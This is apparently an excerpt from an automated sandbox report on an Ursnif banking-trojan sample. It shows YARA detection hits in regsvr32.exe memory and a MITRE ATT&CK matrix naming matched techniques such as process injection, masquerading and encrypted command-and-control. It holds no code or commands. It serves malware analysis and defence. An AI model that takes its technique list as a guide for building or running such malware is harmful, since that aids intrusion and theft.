            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match, file source: 00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1148674591.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1148901441.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1149054686.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: Process Memory Space: regsvr32.exe PID: 932, type: MEMORY

            Mitre Att&ck Matrix

            The matrix is rebuilt here column by column (one tactic per line), since the extracted rows had fused the cells together. Trailing digits are the report's superscript hit counts (number of matched signatures), flattened into the technique names by extraction; entries without a digit are listed by the matrix but were not matched.

            Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link; Spearphishing Attachment
            Execution: Windows Management Instrumentation31; Scripting121; Exploitation for Client Execution1; Graphical User Interface1; Command-Line Interface; Graphical User Interface; Scripting
            Persistence: Winlogon Helper DLL; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service; Path Interception
            Privilege Escalation: Process Injection12; Accessibility Features; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service; Scheduled Task
            Defense Evasion: Masquerading11; Virtualization/Sandbox Evasion1; Process Injection12; Scripting121; File Deletion1; Obfuscated Files or Information2; DLL Side-Loading1
            Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation; Brute Force; Two-Factor Authentication Interception
            Discovery: System Time Discovery1; Virtualization/Sandbox Evasion1; Process Discovery1; Security Software Discovery11; Remote System Discovery1; File and Directory Discovery2; System Information Discovery36
            Lateral Movement: Remote File Copy3; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software; Pass the Hash
            Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Data Staged; Screen Capture; Email Collection
            Exfiltration: Data Encrypted1; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over Command and Control Channel
            Command and Control: Standard Cryptographic Protocol12; Remote File Copy3; Standard Non-Application Layer Protocol3; Standard Application Layer Protocol4; Standard Cryptographic Protocol; Commonly Used Port; Uncommonly Used Port
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

            Behavior Graph

            (Interactive process/signature/file/network graph, not reproduced in this extract. Its legend distinguishes: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet.)
            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.